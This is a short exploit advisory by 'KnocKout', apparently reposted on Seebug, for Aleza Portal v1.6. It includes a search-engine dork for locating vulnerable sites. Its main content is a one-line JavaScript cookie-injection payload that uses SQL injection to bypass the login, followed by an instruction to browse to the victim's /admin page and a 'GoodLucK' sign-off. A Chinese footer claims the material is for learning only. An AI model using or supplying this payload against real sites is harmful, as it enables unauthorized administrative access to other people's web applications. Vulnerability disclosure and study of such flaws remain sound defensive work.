Aleza Portal v1.6 - Insecure (SQLi) Cookie Handling ========================================================= ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockoutr@msn.com ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~Web App. : Aleza Portal v1.6 ~Software: http://www.webavail.com/ -Demo : http://www.webavail.com/alezademo/ ~Vulnerability Style : (SQLi) Cookie Handling ~Google Keywords : Copyright 2001 WebAvail Productions, Inc. All Rights Reserved. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ Explotation ~~~~~~~~~~~ Browser Injection for handling() by Javascript-SQLi Codes ================================ javascript:document.cookie="alezalogin=login='or'level=11&pass='or';path=/"; ================================ [+] Exploitable Browser Injected! [+] Go to : http://[Victim]/admin GoodLucK ;)
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论